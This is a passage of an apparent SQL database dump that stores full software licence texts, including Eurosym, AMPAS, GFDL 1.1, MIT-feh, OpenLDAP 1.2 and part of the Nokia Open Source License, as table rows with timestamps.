promote\nproducts derived from this software without prior written permission. For\nwritten permission, please contact epl@entessa.com.\n\n5. Products derived from this software may not be called \"openSEAL\", nor may\n\"openSEAL\" appear in their name, without prior written permission of Entessa.\n\nTHIS SOFTWARE IS PROVIDED ``AS IS\'\' AND ANY EXPRESSED OR IMPLIED WARRANTIES,\nINCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND\nFITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL ENTESSA,\nLLC, OPENSEAL OR ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\nPROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\nOR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER\nIN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\nARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGE.\n\nThis software consists of voluntary contributions made by many individuals\non behalf of openSEAL and was originally based on software contributed by\nEntessa, LLC, http://www.entessa.com. For more information on the openSEAL,\nplease see <http://www.openseal.org/>.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(83,'Eurosym','Copyright (c) 1999-2002 Henrik Theiling \n\nLicence Version 2\n\n\n\nThis software is provided \'as-is\', without warranty of any kind, express or\nimplied. In no event will the authors or copyright holders be held liable\nfor any damages arising from the use of this software.\n\nPermission is granted to anyone to use this software for any purpose, including\ncommercial applications, and to alter it and redistribute it freely, subject\nto the following restrictions:\n\n1. The origin of this software must not be misrepresented; you must not claim\nthat you wrote the original software. If you use this software in a product,\nan acknowledgment in the product documentation would be appreciated.\n\n2. Altered source versions must be plainly marked as such, and must not be\nmisrepresented as being the original software.\n\n3. You must not use any of the names of the authors or copyright holders of\nthe original software for advertising or publicity pertaining to distribution\nwithout specific, written prior permission.\n\n4. If you change this software and redistribute parts or all of it in any\nform, you must make the source code of the altered version of this software\navailable.\n\n 5. This notice may not be removed or altered from any source distribution.\n\nThis licence is governed by the Laws of Germany. Disputes shall be settled\nby Saarbruecken City Court.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(84,'AMPAS','Copyright (c) 2006 Academy of Motion Picture Arts and Sciences (\"A.M.P.A.S.\").\nPortions contributed by others as indicated. All rights reserved.\n\nA world-wide, royalty-free, non-exclusive right to distribute, copy, modify,\ncreate derivatives, and use, in source and binary forms, is hereby granted,\nsubject to acceptance of this license. Performance of any of the aforementioned\nacts indicates acceptance to be bound by the following terms and conditions:\n\n* Redistributions of source code must retain the above copyright notice, this\nlist of conditions and the Disclaimer of Warranty.\n\n* Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the Disclaimer of Warranty in the documentation\nand/or other materials provided with the distribution.\n\n* Nothing in this license shall be deemed to grant any rights to trademarks,\ncopyrights, patents, trade secrets or any other intellectual property of A.M.P.A.S.\nor any contributors, except as expressly stated herein, and neither the name\nof A.M.P.A.S. nor of any other contributors to this software, may be used\nto endorse or promote products derived from this software without specific\nprior written permission of A.M.P.A.S. or contributor, as appropriate.\n\nThis license shall be governed by the laws of the State of California, and\nsubject to the jurisdiction of the courts therein.\n\nDisclaimer of Warranty: THIS SOFTWARE IS PROVIDED BY A.M.P.A.S. AND CONTRIBUTORS\n\"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED\nTO, THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE,\nAND NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL A.M.P.A.S., ANY CONTRIBUTORS\nOR DISTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\nOR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE\nGOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\nHOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\nLIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\nOUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\nDAMAGE.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(85,'GFDL-1.1-or-later','GNU Free Documentation License\n\nVersion 1.1, March 2000\n\nCopyright (C) 2000 Free Software Foundation, Inc. 51 Franklin St, Fifth Floor,\nBoston, MA 02110-1301 USA\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but changing it is not allowed.\n\n 0. PREAMBLE\n\nThe purpose of this License is to make a manual, textbook, or other written\ndocument \"free\" in the sense of freedom: to assure everyone the effective\nfreedom to copy and redistribute it, with or without modifying it, either\ncommercially or noncommercially. Secondarily, this License preserves for the\nauthor and publisher a way to get credit for their work, while not being considered\nresponsible for modifications made by others.\n\nThis License is a kind of \"copyleft\", which means that derivative works of\nthe document must themselves be free in the same sense. It complements the\nGNU General Public License, which is a copyleft license designed for free\nsoftware.\n\nWe have designed this License in order to use it for manuals for free software,\nbecause free software needs free documentation: a free program should come\nwith manuals providing the same freedoms that the software does. But this\nLicense is not limited to software manuals; it can be used for any textual\nwork, regardless of subject matter or whether it is published as a printed\nbook. We recommend this License principally for works whose purpose is instruction\nor reference.\n\n 1. APPLICABILITY AND DEFINITIONS\n\nThis License applies to any manual or other work that contains a notice placed\nby the copyright holder saying it can be distributed under the terms of this\nLicense. The \"Document\", below, refers to any such manual or work. Any member\nof the public is a licensee, and is addressed as \"you\".\n\nA \"Modified Version\" of the Document means any work containing the Document\nor a portion of it, either copied verbatim, or with modifications and/or translated\ninto another language.\n\nA \"Secondary Section\" is a named appendix or a front-matter section of the\nDocument that deals exclusively with the relationship of the publishers or\nauthors of the Document to the Document\'s overall subject (or to related matters)\nand contains nothing that could fall directly within that overall subject.\n(For example, if the Document is in part a textbook of mathematics, a Secondary\nSection may not explain any mathematics.) The relationship could be a matter\nof historical connection with the subject or with related matters, or of legal,\ncommercial, philosophical, ethical or political position regarding them.\n\nThe \"Invariant Sections\" are certain Secondary Sections whose titles are designated,\nas being those of Invariant Sections, in the notice that says that the Document\nis released under this License.\n\nThe \"Cover Texts\" are certain short passages of text that are listed, as Front-Cover\nTexts or Back-Cover Texts, in the notice that says that the Document is released\nunder this License.\n\nA \"Transparent\" copy of the Document means a machine-readable copy, represented\nin a format whose specification is available to the general public, whose\ncontents can be viewed and edited directly and straightforwardly with generic\ntext editors or (for images composed of pixels) generic paint programs or\n(for drawings) some widely available drawing editor, and that is suitable\nfor input to text formatters or for automatic translation to a variety of\nformats suitable for input to text formatters. A copy made in an otherwise\nTransparent file format whose markup has been designed to thwart or discourage\nsubsequent modification by readers is not Transparent. A copy that is not\n\"Transparent\" is called \"Opaque\".\n\nExamples of suitable formats for Transparent copies include plain ASCII without\nmarkup, Texinfo input format, LaTeX input format, SGML or XML using a publicly\navailable DTD, and standard-conforming simple HTML designed for human modification.\nOpaque formats include PostScript, PDF, proprietary formats that can be read\nand edited only by proprietary word processors, SGML or XML for which the\nDTD and/or processing tools are not generally available, and the machine-generated\nHTML produced by some word processors for output purposes only.\n\nThe \"Title Page\" means, for a printed book, the title page itself, plus such\nfollowing pages as are needed to hold, legibly, the material this License\nrequires to appear in the title page. For works in formats which do not have\nany title page as such, \"Title Page\" means the text near the most prominent\nappearance of the work\'s title, preceding the beginning of the body of the\ntext.\n\n 2. VERBATIM COPYING\n\nYou may copy and distribute the Document in any medium, either commercially\nor noncommercially, provided that this License, the copyright notices, and\nthe license notice saying this License applies to the Document are reproduced\nin all copies, and that you add no other conditions whatsoever to those of\nthis License. You may not use technical measures to obstruct or control the\nreading or further copying of the copies you make or distribute. However,\nyou may accept compensation in exchange for copies. If you distribute a large\nenough number of copies you must also follow the conditions in section 3.\n\nYou may also lend copies, under the same conditions stated above, and you\nmay publicly display copies.\n\n 3. COPYING IN QUANTITY\n\nIf you publish printed copies of the Document numbering more than 100, and\nthe Document\'s license notice requires Cover Texts, you must enclose the copies\nin covers that carry, clearly and legibly, all these Cover Texts: Front-Cover\nTexts on the front cover, and Back-Cover Texts on the back cover. Both covers\nmust also clearly and legibly identify you as the publisher of these copies.\nThe front cover must present the full title with all words of the title equally\nprominent and visible. You may add other material on the covers in addition.\nCopying with changes limited to the covers, as long as they preserve the title\nof the Document and satisfy these conditions, can be treated as verbatim copying\nin other respects.\n\nIf the required texts for either cover are too voluminous to fit legibly,\nyou should put the first ones listed (as many as fit reasonably) on the actual\ncover, and continue the rest onto adjacent pages.\n\nIf you publish or distribute Opaque copies of the Document numbering more\nthan 100, you must either include a machine-readable Transparent copy along\nwith each Opaque copy, or state in or with each Opaque copy a publicly-accessible\ncomputer-network location containing a complete Transparent copy of the Document,\nfree of added material, which the general network-using public has access\nto download anonymously at no charge using public-standard network protocols.\nIf you use the latter option, you must take reasonably prudent steps, when\nyou begin distribution of Opaque copies in quantity, to ensure that this Transparent\ncopy will remain thus accessible at the stated location until at least one\nyear after the last time you distribute an Opaque copy (directly or through\nyour agents or retailers) of that edition to the public.\n\nIt is requested, but not required, that you contact the authors of the Document\nwell before redistributing any large number of copies, to give them a chance\nto provide you with an updated version of the Document.\n\n 4. MODIFICATIONS\n\nYou may copy and distribute a Modified Version of the Document under the conditions\nof sections 2 and 3 above, provided that you release the Modified Version\nunder precisely this License, with the Modified Version filling the role of\nthe Document, thus licensing distribution and modification of the Modified\nVersion to whoever possesses a copy of it. In addition, you must do these\nthings in the Modified Version:\n\nA. Use in the Title Page (and on the covers, if any) a title distinct from\nthat of the Document, and from those of previous versions (which should, if\nthere were any, be listed in the History section of the Document). You may\nuse the same title as a previous version if the original publisher of that\nversion gives permission.\n\nB. List on the Title Page, as authors, one or more persons or entities responsible\nfor authorship of the modifications in the Modified Version, together with\nat least five of the principal authors of the Document (all of its principal\nauthors, if it has less than five).\n\nC. State on the Title page the name of the publisher of the Modified Version,\nas the publisher.\n\n D. Preserve all the copyright notices of the Document.\n\nE. Add an appropriate copyright notice for your modifications adjacent to\nthe other copyright notices.\n\nF. Include, immediately after the copyright notices, a license notice giving\nthe public permission to use the Modified Version under the terms of this\nLicense, in the form shown in the Addendum below.\n\nG. Preserve in that license notice the full lists of Invariant Sections and\nrequired Cover Texts given in the Document\'s license notice.\n\n H. Include an unaltered copy of this License.\n\nI. Preserve the section entitled \"History\", and its title, and add to it an\nitem stating at least the title, year, new authors, and publisher of the Modified\nVersion as given on the Title Page. If there is no section entitled \"History\"\nin the Document, create one stating the title, year, authors, and publisher\nof the Document as given on its Title Page, then add an item describing the\nModified Version as stated in the previous sentence.\n\nJ. Preserve the network location, if any, given in the Document for public\naccess to a Transparent copy of the Document, and likewise the network locations\ngiven in the Document for previous versions it was based on. These may be\nplaced in the \"History\" section. You may omit a network location for a work\nthat was published at least four years before the Document itself, or if the\noriginal publisher of the version it refers to gives permission.\n\nK. In any section entitled \"Acknowledgements\" or \"Dedications\", preserve the\nsection\'s title, and preserve in the section all the substance and tone of\neach of the contributor acknowledgements and/or dedications given therein.\n\nL. Preserve all the Invariant Sections of the Document, unaltered in their\ntext and in their titles. Section numbers or the equivalent are not considered\npart of the section titles.\n\nM. Delete any section entitled \"Endorsements\". Such a section may not be included\nin the Modified Version.\n\nN. Do not retitle any existing section as \"Endorsements\" or to conflict in\ntitle with any Invariant Section.\n\nIf the Modified Version includes new front-matter sections or appendices that\nqualify as Secondary Sections and contain no material copied from the Document,\nyou may at your option designate some or all of these sections as invariant.\nTo do this, add their titles to the list of Invariant Sections in the Modified\nVersion\'s license notice. These titles must be distinct from any other section\ntitles.\n\nYou may add a section entitled \"Endorsements\", provided it contains nothing\nbut endorsements of your Modified Version by various parties--for example,\nstatements of peer review or that the text has been approved by an organization\nas the authoritative definition of a standard.\n\nYou may add a passage of up to five words as a Front-Cover Text, and a passage\nof up to 25 words as a Back-Cover Text, to the end of the list of Cover Texts\nin the Modified Version. Only one passage of Front-Cover Text and one of Back-Cover\nText may be added by (or through arrangements made by) any one entity. If\nthe Document already includes a cover text for the same cover, previously\nadded by you or by arrangement made by the same entity you are acting on behalf\nof, you may not add another; but you may replace the old one, on explicit\npermission from the previous publisher that added the old one.\n\nThe author(s) and publisher(s) of the Document do not by this License give\npermission to use their names for publicity for or to assert or imply endorsement\nof any Modified Version.\n\n 5. COMBINING DOCUMENTS\n\nYou may combine the Document with other documents released under this License,\nunder the terms defined in section 4 above for modified versions, provided\nthat you include in the combination all of the Invariant Sections of all of\nthe original documents, unmodified, and list them all as Invariant Sections\nof your combined work in its license notice.\n\nThe combined work need only contain one copy of this License, and multiple\nidentical Invariant Sections may be replaced with a single copy. If there\nare multiple Invariant Sections with the same name but different contents,\nmake the title of each such section unique by adding at the end of it, in\nparentheses, the name of the original author or publisher of that section\nif known, or else a unique number. Make the same adjustment to the section\ntitles in the list of Invariant Sections in the license notice of the combined\nwork.\n\nIn the combination, you must combine any sections entitled \"History\" in the\nvarious original documents, forming one section entitled \"History\"; likewise\ncombine any sections entitled \"Acknowledgements\", and any sections entitled\n\"Dedications\". You must delete all sections entitled \"Endorsements.\"\n\n 6. COLLECTIONS OF DOCUMENTS\n\nYou may make a collection consisting of the Document and other documents released\nunder this License, and replace the individual copies of this License in the\nvarious documents with a single copy that is included in the collection, provided\nthat you follow the rules of this License for verbatim copying of each of\nthe documents in all other respects.\n\nYou may extract a single document from such a collection, and distribute it\nindividually under this License, provided you insert a copy of this License\ninto the extracted document, and follow this License in all other respects\nregarding verbatim copying of that document.\n\n 7. AGGREGATION WITH INDEPENDENT WORKS\n\nA compilation of the Document or its derivatives with other separate and independent\ndocuments or works, in or on a volume of a storage or distribution medium,\ndoes not as a whole count as a Modified Version of the Document, provided\nno compilation copyright is claimed for the compilation. Such a compilation\nis called an \"aggregate\", and this License does not apply to the other self-contained\nworks thus compiled with the Document, on account of their being thus compiled,\nif they are not themselves derivative works of the Document.\n\nIf the Cover Text requirement of section 3 is applicable to these copies of\nthe Document, then if the Document is less than one quarter of the entire\naggregate, the Document\'s Cover Texts may be placed on covers that surround\nonly the Document within the aggregate. Otherwise they must appear on covers\naround the whole aggregate.\n\n 8. TRANSLATION\n\nTranslation is considered a kind of modification, so you may distribute translations\nof the Document under the terms of section 4. Replacing Invariant Sections\nwith translations requires special permission from their copyright holders,\nbut you may include translations of some or all Invariant Sections in addition\nto the original versions of these Invariant Sections. You may include a translation\nof this License provided that you also include the original English version\nof this License. In case of a disagreement between the translation and the\noriginal English version of this License, the original English version will\nprevail.\n\n 9. TERMINATION\n\nYou may not copy, modify, sublicense, or distribute the Document except as\nexpressly provided for under this License. Any other attempt to copy, modify,\nsublicense or distribute the Document is void, and will automatically terminate\nyour rights under this License. However, parties who have received copies,\nor rights, from you under this License will not have their licenses terminated\nso long as such parties remain in full compliance.\n\n 10. FUTURE REVISIONS OF THIS LICENSE\n\nThe Free Software Foundation may publish new, revised versions of the GNU\nFree Documentation License from time to time. Such new versions will be similar\nin spirit to the present version, but may differ in detail to address new\nproblems or concerns. See http://www.gnu.org/copyleft/.\n\nEach version of the License is given a distinguishing version number. If the\nDocument specifies that a particular numbered version of this License \"or\nany later version\" applies to it, you have the option of following the terms\nand conditions either of that specified version or of any later version that\nhas been published (not as a draft) by the Free Software Foundation. If the\nDocument does not specify a version number of this License, you may choose\nany version ever published (not as a draft) by the Free Software Foundation.\nADDENDUM: How to use this License for your documents\n\nTo use this License in a document you have written, include a copy of the\nLicense in the document and put the following copyright and license notices\njust after the title page:\n\nCopyright (c) YEAR YOUR NAME. Permission is granted to copy, distribute and/or\nmodify this document under the terms of the GNU Free Documentation License,\nVersion 1.1 or any later version published by the Free Software Foundation;\nwith the Invariant Sections being LIST THEIR TITLES , with the Front-Cover\nTexts being LIST , and with the Back-Cover Texts being LIST . A copy of the\nlicense is included in the section entitled \"GNU Free Documentation License\".\n\nIf you have no Invariant Sections, write \"with no Invariant Sections\" instead\nof saying which ones are invariant. If you have no Front-Cover Texts, write\n\"no Front-Cover Texts\" instead of \"Front-Cover Texts being LIST\"; likewise\nfor Back-Cover Texts.\n\nIf your document contains nontrivial examples of program code, we recommend\nreleasing these examples in parallel under your choice of free software license,\nsuch as the GNU General Public License, to permit their use in free software.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(86,'MIT-feh','Permission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is furnished\nto do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies of the Software and its documentation and acknowledgment shall\nbe given in the documentation and software packages that this Software was\nused.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS\nBE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\nOF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH\nTHE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(87,'OLDAP-1.2','The OpenLDAP Public License\n\nVersion 1.2, 1 September 1998\n\nCopyright 1998, The OpenLDAP Foundation. All Rights Reserved. Note: This license\nis derived from the \"Artistic License\" as distributed with the Perl Programming\nLanguage. As differences may exist, the complete license should be read.\n\nPREAMBLE\n\nThe intent of this document is to state the conditions under which a Package\nmay be copied, such that the Copyright Holder maintains some semblance of\nartistic control over the development of the package, while giving the users\nof the package the right to use and distribute the Package in a more-or-less\ncustomary fashion, plus the right to make reasonable modifications.\n\nDefinitions:\n\n\"Package\" refers to the collection of files distributed by the Copyright Holder,\nand derivatives of that collection of files created through textual modification.\n\n\"Standard Version\" refers to such a Package if it has not been modified, or\nhas been modified in accordance with the wishes of the Copyright Holder.\n\n\"Copyright Holder\" is whoever is named in the copyright or copyrights for\nthe package.\n\n\"You\" is you, if you\'re thinking about copying or distributing this Package.\n\n\"Reasonable copying fee\" is whatever you can justify on the basis of media\ncost, duplication charges, time of people involved, and so on. (You will not\nbe required to justify it to the Copyright Holder, but only to the computing\ncommunity at large as a market that must bear the fee.)\n\n\"Freely Available\" means that no fee is charged for the item itself, though\nthere may be fees involved in handling the item. It also means that recipients\nof the item may redistribute it under the same conditions they received it.\n\n1. You may make and give away verbatim copies of the source form of the Standard\nVersion of this Package without restriction, provided that you duplicate all\nof the original copyright notices and associated disclaimers.\n\n2. You may apply bug fixes, portability fixes and other modifications derived\nfrom the Public Domain or from the Copyright Holder. A Package modified in\nsuch a way shall still be considered the Standard Version.\n\n3. You may otherwise modify your copy of this Package in any way, provided\nthat you insert a prominent notice in each changed file stating how and when\nyou changed that file, and provided that you do at least ONE of the following:\n\na) place your modifications in the Public Domain or otherwise make them Freely\nAvailable, such as by posting said modifications to Usenet or an equivalent\nmedium, or placing the modifications on a major archive site such as uunet.uu.net,\nor by allowing the Copyright Holder to include your modifications in the Standard\nVersion of the Package.\n\n b) use the modified Package only within your corporation or organization.\n\nc) rename any non-standard executables so the names do not conflict with standard\nexecutables, which must also be provided, and provide a separate manual page\nfor each non-standard executable that clearly documents how it differs from\nthe Standard Version.\n\n d) make other distribution arrangements with the Copyright Holder.\n\n4. You may distribute the programs of this Package in object code or executable\nform, provided that you do at least ONE of the following:\n\na) distribute a Standard Version of the executables and library files, together\nwith instructions (in the manual page or equivalent) on where to get the Standard\nVersion.\n\nb) accompany the distribution with the machine-readable source of the Package\nwith your modifications.\n\nc) accompany any non-standard executables with their corresponding Standard\nVersion executables, giving the non-standard executables non-standard names,\nand clearly documenting the differences in manual pages (or equivalent), together\nwith instructions on where to get the Standard Version.\n\n d) make other distribution arrangements with the Copyright Holder.\n\n5. You may charge a reasonable copying fee for any distribution of this Package.\nYou may charge any fee you choose for support of this Package. You may not\ncharge a fee for this Package itself. However, you may distribute this Package\nin aggregate with other (possibly commercial) programs as part of a larger\n(possibly commercial) software distribution provided that you do not advertise\nthis Package as a product of your own.\n\n6. The scripts and library files supplied as input to or produced as output\nfrom the programs of this Package do not automatically fall under the copyright\nof this Package, but belong to whomever generated them, and may be sold commercially,\nand may be aggregated with this Package.\n\n7. C subroutines supplied by you and linked into this Package in order to\nemulate subroutines and variables of the language defined by this Package\nshall not be considered part of this Package, but are the equivalent of input\nas in Paragraph 6, provided these subroutines do not change the language in\nany way that would cause it to fail the regression tests for the language.\n\n8. The name of the Copyright Holder may not be used to endorse or promote\nproducts derived from this software without specific prior written permission.\n\n9. THIS PACKAGE IS PROVIDED \"AS IS\" AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES,\nINCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF MERCHANTIBILITY AND\nFITNESS FOR A PARTICULAR PURPOSE. The End\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(88,'Nokia','Nokia Open Source License (NOKOS License)\n\nVersion 1.0a 1. DEFINITIONS.\n\n\"Affiliates\" of a party shall mean an entity\n\n a) which is directly or indirectly controlling such party;\n\nb) which is under the same direct or indirect ownership or control as such\nparty; or\n\n c) which is directly or indirectly owned or controlled by such party.\n\nFor these purposes, an entity shall be treated as being controlled by another\nif that other entity has fifty percent (50%) or more of the votes in such\nentity, is able to direct its affairs and/or to control the composition of\nits board of directors or equivalent body.\n\n\"Commercial Use\" shall mean distribution or otherwise making the Covered Software\navailable to a third party.\n\n\"Contributor\" shall mean each entity that creates or contributes to the creation\nof Modifications.\n\n\"Contributor Version\" shall mean in case of any Contributor the combination\nof the Original Software, prior Modifications used by a Contributor, and the\nModifications made by that particular Contributor and in case of Nokia in\naddition the Original Software in any form, including the form as Exceutable.\n\n\"Covered Software\" shall mean the Original Software or Modifications or the\ncombination of the Original Software and Modifications, in each case including\nportions thereof.\n\n\"Electronic Distribution Mechanism\" shall mean a mechanism generally accepted\nin the software development community for the electronic transfer of data.\n\n\"Executable\" shall mean Covered Software in any form other than Source Code.\n\n\"Nokia\" shall mean Nokia Corporation and its Affiliates.\n\n\"Larger Work\" shall mean a work, which combines Covered Software or portions\nthereof with code not governed by the terms of this License.\n\n\"License\" shall mean this document.\n\n\"Licensable\" shall mean having the right to grant, to the maximum extent possible,\nwhether at the time of the initial grant or subsequently acquired, any and\nall of the rights conveyed herein.\n\n\"Modifications\" shall mean any addition to or deletion from the substance\nor structure of either the Original Software or any previous Modifications.\nWhen Covered Software is released as a series of files, a Modification is:\n\na) Any addition to or deletion from the contents of a file containing Original\nSoftware or previous Modifications.\n\nb) Any new file that contains any part of the Original Software or previous\nModifications.\n\n\"Original Software\" shall mean the Source Code of computer software code which\nis described in the Source Code notice required by Exhibit A as Original Software,\nand which, at the time of its release under this License is not already Covered\nSoftware governed by this License.\n\n\"Patent Claims\" shall mean any patent claim(s), now owned or hereafter acquired,\nincluding without limitation, method, process, and apparatus claims, in any\npatent Licensable by grantor.\n\n\"Source Code\" shall mean the preferred form of the Covered Software for making\nmodifications to it, including all modules it contains, plus any associated\ninterface definition files, scripts used to control compilation and installation\nof an Executable, or source code differential comparisons against either the\nOriginal Software or another well known, available Covered Software of the\nContributor\'s choice. The Source Code can be in a compressed or archival form,\nprovided the appropriate decompression or de-archiving software is widely\navailable for no charge.\n\n\"You\" (or \"Your\") shall mean an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License or a future version\nof this License issued under Section 6.1. For legal entities, \"You\" includes\nAffiliates of such entity. 2. SOURCE CODE LICENSE.\n\n 2.1 Nokia Grant.\n\nSubject to the terms of this License, Nokia hereby grants You a world-wide,\nroyalty-free, non-exclusive license, subject to third party intellectual property\nclaims:\n\na) under copyrights Licensable by Nokia to use, reproduce, modify, display,\nperform, sublicense and distribute the Original Software (or portions thereof)\nwith or without Modifications, and/or as part of a Larger Work;\n\nb) and under Patents Claims necessarily infringed by the making, using or\nselling of Original Software, to make, have made, use, practice, sell, and\noffer for sale, and/or otherwise dispose of the Original Software (or portions\nthereof).\n\nc) The licenses granted in this Section 2.1(a) and (b) are effective on the\ndate Nokia first distributes Original Software under the terms of this License.\n\nd) Notwithstanding Section 2.1(b) above, no patent license is granted: 1)\nfor code that You delete from the Original Software; 2) separate from the\nOriginal Software; or 3) for infringements caused by: i) the modification\nof the Original Software or ii) the combination of the Original Software with\nother software or devices.\n\n 2.2 Contributor Grant.\n\nSubject to the terms of this License and subject to third party intellectual\nproperty claims, each Contributor hereby grants You a world-wide, royalty-free,\nnon-exclusive license\n\na) under copyrights Licensable by Contributor, to use, reproduce, modify,\ndisplay, perform, sublicense and distribute the Modifications created by such\nContributor (or portions thereof) either on an unmodified basis, with other\nModifications, as Covered Software and/or as part of a Larger Work; and\n\nb) under Patent Claims necessarily infringed by the making, using, or selling\nof Modifications made by that Contributor either alone and/or in combination\nwith its Contributor Version (or portions of such combination), to make, use,\nsell, offer for sale, have made, and/or otherwise dispose of: 1) Modifications\nmade by that Contributor (or portions thereof); and 2) the combination of\nModifications made by that Contributor with its Contributor Version (or portions\nof such combination).\n\nc) The licenses granted in Sections 2.2(a) and 2.2(b) are effective on the\ndate Contributor first makes Commercial Use of the Covered Software.\n\nd) Notwithstanding Section 2.2(b) above, no patent license is granted: 1)\nfor any code that Contributor has deleted from the Contributor Version; 2)\nseparate from the Contributor Version; 3) for infringements caused by: i)\nthird party modifications of Contributor Version or ii) the combination of\nModifications made by that Contributor with other software (except as part\nof the Contributor Version) or other devices; or 4) under Patent Claims infringed\nby Covered Software in the absence of Modifications made by that Contributor.\n3. DISTRIBUTION OBLIGATIONS.\n\n 3.1 Application of License.\n\nThe Modifications which You create or to which You contribute are governed\nby the terms of this License, including without limitation Section 2.2. The\nSource Code version of Covered Software may be distributed only under the\nterms of this License or a future version of this License released under Section\n6.1, and You must include a copy of this License with every copy of the Source\nCode You distribute. You may not offer or impose any terms on any Source Code\nversion that alters or restricts the applicable version of this License or\nthe recipients\' rights hereunder. However, You may include an additional document\noffering the additional rights described in Section 3.5.\n\n 3.2 Availability of Source Code.\n\nAny Modification which You create or to which You contribute must be made\navailable in Source Code form under the terms of this License either on the\nsame media as an Executable version or via an accepted Electronic Distribution\nMechanism to anyone to whom you made an Executable version available; and\nif made available via Electronic Distribution Mechanism, must remain available\nfor at least twelve (12) months after the date it initially became available,\nor at least six (6) months after a subsequent version of that particular Modification\nhas been made available to such recipients. You are responsible for ensuring\nthat the Source Code version remains available even if the Electronic Distribution\nMechanism is maintained by a third party.\n\n 3.3 Description of Modifications.\n\nYou must cause all Covered Software to which You contribute to contain a file\ndocumenting the changes You made to create that Covered Software and the date\nof any change. You must include a prominent statement that the Modification\nis derived, directly or indirectly, from Original Software provided by Nokia\nand including the name of Nokia in (a) the Source Code, and (b) in any notice\nin an Executable version or related documentation in which You describe the\norigin or ownership of the Covered Software.\n\n 3.4 Intellectual Property Matters\n\n(a) Third Party Claims. If Contributor has knowledge that a license under\na third party\'s intellectual property rights is required to exercise the rights\ngranted by such Contributor under Sections 2.1 or 2.2, Contributor must include\na text file with the Source Code distribution titled \"LEGAL\" which describes\nthe claim and the party making the claim in sufficient detail that a recipient\nwill know whom to contact. If Contributor obtains such knowledge after the\nModification is made available as described in Section 3.2, Contributor shall\npromptly modify the LEGAL file in all copies Contributor makes available thereafter\nand shall take other steps (such as notifying appropriate mailing lists or\nnewsgroups) reasonably calculated to inform those who received the Covered\nSoftware that new knowledge has been obtained.\n\n(b) Contributor APIs. If Contributor\'s Modifications include an application\nprogramming interface and Contributor has knowledge of patent licenses which\nare reasonably necessary to implement that API, Contributor must also include\nthis information in the LEGAL file.\n\n(c) Representations. Contributor represents that, except as disclosed pursuant\nto Section 3.4(a) above, Contributor believes that Contributor\'s Modifications\nare Contributor\'s original creation(s) and/or Contributor has sufficient rights\nto grant the rights conveyed by this License.\n\n 3.5 Required Notices.\n\nYou must duplicate the notice in Exhibit A in each file of the Source Code.\nIf it is not possible to put such notice in a particular Source Code file\ndue to its structure, then You must include such notice in a location (such\nas a relevant directory) where a user would be likely to look for such a notice.\nIf You created one or more Modification(s) You may add your name as a Contributor\nto the notice described in Exhibit A. You must also duplicate this License\nin any documentation for the Source Code where You describe recipients\' rights\nor ownership rights relating to Covered Software. You may choose to offer,\nand to charge a fee for, warranty, support, indemnity or liability obligations\nto one or more recipients of Covered Software. However, You may do so only\non Your own behalf, and not on behalf of Nokia or any Contributor. You must\nmake it absolutely clear that any such warranty, support, indemnity or liability\nobligation is offered by You alone, and You hereby agree to indemnify Nokia\nand every Contributor for any liability incurred by Nokia or such Contributor\nas a result of warranty, support, indemnity or liability terms You offer.\n\n 3.6 Distribution of Executable Versions.\n\nYou may distribute Covered Software in Executable form only if the requirements\nof Section 3.1-3.5 have been met for that Covered Software, and if You include\na notice stating that the Source Code version of the Covered Software is available\nunder the terms of this License, including a description of how and where\nYou have fulfilled the obligations of Section 3.2. The notice must be conspicuously\nincluded in any notice in an Executable version, related documentation or\ncollateral in which You describe recipients\' rights relating to the Covered\nSoftware. You may distribute the 